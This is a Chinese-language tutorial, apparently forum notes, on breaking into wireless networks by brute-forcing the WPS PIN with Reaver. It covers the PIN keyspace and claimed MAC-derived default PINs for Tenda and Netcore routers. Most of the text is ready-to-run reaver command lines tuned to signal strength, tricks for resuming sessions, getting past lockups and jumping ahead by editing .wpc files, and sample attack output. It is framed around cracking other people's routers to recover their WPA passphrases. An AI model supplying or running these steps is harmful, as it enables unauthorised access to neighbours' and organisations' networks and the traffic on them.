都是自己学习PIN时的一些东西,希望对大家有点帮助
无线破解现状
1、老路由没有pin功能,并且设置wpa15位以上长密码的。
缺点:这类路由破解需要抓包跑字典,基本无解;
2、WEP加密的新旧款无线路由基本百分百能解出密码。
缺点:WEP越来越少
3、近两年新款无线支持pin码的路由,基本百分百能破解密码和pin码。
优点:WPA、WPA2被授予无法破解的神话,这个神话终于被pin破解打破,基本上这两年的新款路由都支持pin功能
无线路由pin码一共11000组数字组成前四位是0000~9999,后三位是000~999,最后以为是0~9.这样就可以肯定不管对方路由设置的是什么密码,都逃不过这11000组数字。只要他支持pin功能我们就可以百分百的破解出对方路由的pin码和设置的wpa密码(密码以明文方式显示)
缺点:这种破解只能针对近两年的新路由,就是软件搜到后面显示wps名称的路由。老路由不支持pin功能只有继续使用原始方式破解。并且pin的过程中容易出现把对方路由端口堵死(堵死后必须等待对方重启路由才能继续完成破解)
破解时间较长几分钟~几小时
关于WPS
From:
http://baike.baidu.com/view/4543635.htm WPS是一项非专有的规范,它是由Wi-Fi联盟实施的认证项目。 WPS是Wi-Fi认证产品的可选认证项目。 并非所有的Wi-Fi认证产品都支持WPS,用户可在产品上寻找Wi-Fi Protected Setup 的标志,以确保所购产品已具备 Wi-Fi Protected Setup功能。已通过Wi-Fi Protected Setup 的产品目前能够为用户提供两种安装解决方案: 输入PIN码――对于WPS认证的设备为强制配置。 按钮配置(PBC)――它可以是设备上的硬件按钮或软件模拟的按钮(对于无线客户端为可选配置)。在PIN配置模式中,系统在接入点或无线路由器中设置注册表,用户通过在注册表中输入客户端PIN码为网络中新增设备分配证书(注意:在PBC模式中,当客户端PIN码为全0时,系统也需要设置注册表)。 WPS并没有新增安全性能――它使得现有的安全技术更容易配置。
PIN计算新突破:部分无线路由可直接由MAC计算出默认PIN
近日,腾达部分以MAC为“C83A35”,“00B00C”打头的,包含腾达W150M在内的产品以及
磊科NW705P,
磊科NW705S,
磊科NW705+,
磊科NW714,
磊科NW702,
磊科NW712,
磊科NW709
等产品相继泄露出PIN算法。
如果您的路由MAC前6位是C83A35或者00B00C,输入后六位MAC,您可以直接获取到PIN密钥
其PIN算法十分简陋,只需要将相应前6位MAC开头的产品的后6位16进制MAC转化成10进制数,即可得到一个7位数字。众所周知的是,PIN由8位构成,其前7位为随机,而第八位为校验位,可通过前七位计算得来。从而直接由MAC获取出PIN,并通过Reaver获取其WPA PSK密钥,从而快速破解路由。
根据IEEE标准数据库信息,C83A35和00B00C均属于腾达科技旗下的OUI地址,此次受影响的路由包括但不限于腾达W150M等腾达型号的,具备QSS/WPS连接功能的路由。
WiFiBETA预测,磊科官方全线产品均采用这种简单的,不安全的,非随机的PIN生成方案。其官方网站声明提到,受影响的产品为本文文初所罗列,其相关升级软件(初步估计为固件或PIN重烧录工具)正在开发中。而腾达中有部分产品,其OUI为C83A35,00B00C,081075等的路由均亦采用此类算法。值得一提的是,腾达官方并未做出任何证明回应。
关于Reaver
reaver-wps
Brute force attack against Wifi Protected Setup
Homepage:
http://code.google.com/p/reaver-wps/On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
douglas@pentest:~/pentest/wireless/reaver-1.4/src$ ./configure
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for pcap_open_live in -lpcap... no
error: pcap library not found!
sudo apt-get install libpcap0.8-dev
xxxxxx@pentest:~/pentest/wireless/reaver-1.4/src$ ./reaver
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <
http://forum.cnsec.org/mailto:cheffner@tacnetsol.com>
Required Arguments: 必选参数
-i, --interface=<wlan> Name of the monitor-mode interface to use 使用到的监控模式的接口的名字
-b, --bssid=<mac> BSSID of the target AP 目标AP的BSSID
Optional Arguments: 可选参数
-m, --mac=<mac> MAC of the host system 主机系统的MAD地址
-e, --essid=<ssid> ESSID of the target AP 目标AP的ESSID
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) 设置802.11 频道的接口 意味着-f
-o, --out-file=<file> Send output to a log file [stdout] 发送输出到一个log文件(标准输出)
-s, --session=<file> Restore a previous session file 恢复以前的会话文件
-C, --exec=<command> Execute the supplied command upon successful pin recovery 在pin成功回复后执行如下命令
-D, --daemonize Daemonize reaver 守护进程
-a, --auto Auto detect the best advanced options for the target AP 自动检测目标AP最好的高级选项
-f, --fixed Disable channel hopping 禁用频道跳频
-5, --5ghz Use 5GHz 802.11 channels 使用5GHz 802.11 频道
-v, --verbose Display non-critical warnings (-vv for more) 显示非严重警告(vv更多) verbose 详细
-q, --quiet Only display critical messages 安静 仅显示关键消息
-h, --help Show help 显示帮助
Advanced Options: 高级选项
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin 使用指定的4个或8个数字WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1] 设置延迟之后的尝试
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] 设置时间等待,如果AP锁定WPS pin尝试
-g, --max-attempts=<num> Quit after num pin attempts 数字pin尝试后退出
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] 设置睡眠时间在10次意外失败之后
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts 睡眠Y秒后尝试x pin
-t, --timeout=<seconds> Set the receive timeout period [5] 设置超时周期
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] 设置M5/M7超时周期
-A, --no-associate Do not associate with the AP (association must be done by another application) 不关联到AP 使用另外的程序关联
-N, --no-nacks Do not send NACK messages when out of order packets are received 当乱序数据包被接收时,不发送NACK消息
-S, --dh-small Use small DH keys to improve crack speed 使用小DH密钥来提高破解速度
-L, --ignore-locks Ignore locked state reported by the target AP 忽略报告为锁定状态的AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet 使用一个EAP FAIL包来终止灭个WPS会话
-n, --nack Target AP always sends a NACK [Auto] 总是发送一个NACK到目标AP
-w, --win7 Mimic a Windows 7 registrar [False] 模仿Windows 7 登记
Example: 例如
./reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
Reaver的一些技巧
使用PIN方法破解WPA-PSK密码有一个限制,就是AP必须开启了QSS、WPS功能!
使用airodump-ng扫描时候在MB栏中54e后面有点(.)的是开了wps。但是这个要多试几次才准。可以先用Qss软件测试一下
或者在win7下面,连接AP时候在密码输入框下面有“通过按路由器按钮也可以连接”字样也是开启了QSS、wps的。
关于信号
PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
关于死循环
当出现的时候
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
按Ctrl +C 停止,然后使用
reaver -i mon0 -b mac地址 -a -S -vv -s /root/e234567890bc.wpc 继续跑
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)会从指定PIN段起破密。
如果进度到99.9%后,AP死机,可打开它,总共1000个3位数,找出剩余的十几个PIN码,用QSS、WPS客户端软件,手动测试、破密。
如果是跑了99.99%死机, 意味吗? 你懂的吧? 最后一个PIN就是。
指定PIN码,获得WPA 密码PSK
reaver -i mon0 -b MAC -p 8位数PIN值
如果上述措施不后,仍不见PSK密码,可能因软件原因,漏码了!重新跑后三位数
[+] Trying pin 02835679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
===================
正常情况下在M4后,会收到WSC NACK包。这是就知道当前的0283是错误的。然后开始试下一个pin.
缺省情况下,如果在M4后没有收到任何包,等待超时后,也会认为当前的pin是错误的,然后开始试下一个pin.
如果是因为丢包的原因,没有收到M5包,显然正确的pin就会当作错误的pin.因此就会出现99.99%的问题。
解决办法:
加上-n 参数
reaver -vvnS -d 0 -b xxxx
注意:reaver 会为每个AP创建一个pin序列文件,这个文件存放在
/etc/reaver/ 或/usr/local/etc/reaver,
根据reaver的帮助,reaver缺省情况下会自动检查AP是否回应NACK.因此不需要加-n参数才对。
我看了一下代码,这确实是一个bug. 但是通过加-n参数,可以绕过这个bug.
死循环
当你看到PIN到一定程度,窗口里的PIN码不变、进度百分比也不走,那么恭喜你碰到死循环了。
保持原窗口不变,再打开一个shell,然后执行
reaver -i mon0 -b 正在PIN的MAC -a -s -vv
一般人执行的命令都是MAC 后跟的后缀都是 -vv -a -S,然而,殊不知,这样的后缀虽然可以加快速度,但是,也有可能会错过正确前四位的确认。所以,不放过每一次确认信息的命令是
reaver -i mon0 -b MAC -v -a -n 还可以加一个 -c
wpc文件结构
将mac地址.wpc 备份,下次可以继续使用。
wpc结构
0 //这个地方是说它的前4位PIN码的进度位置数
0 //这个地方是说后3位PIN数的已经运行测试位置数
0 //0时没有找到,当为1时找到前四位,当为2时全部找到。
1234
0123
1111
2222
3333
.......
.......
9999
001
002
003
.....
.....
999
所以前四位很重要,将已经知道的前四们放在最前面会提高你的PIN速度,我们也可以手动修改wpc文件第一行,如我们要从3000开始pin你可以将它修改为3004,这样它就会从3000开始PIN了。当我们在PIN时就可以不用保存虚拟机快照了,只要你记住了前四位,你下载用软件修改WPC文件就可了。cdlinux对wpc文件最方便,beini和xiaopan对wpc修改要用命令vi来修改,vi的使用方法很简单vi XXXX.wpc 打开就可以了,输入i进行编辑,escap退回命令模式,输入:wq退出保存。
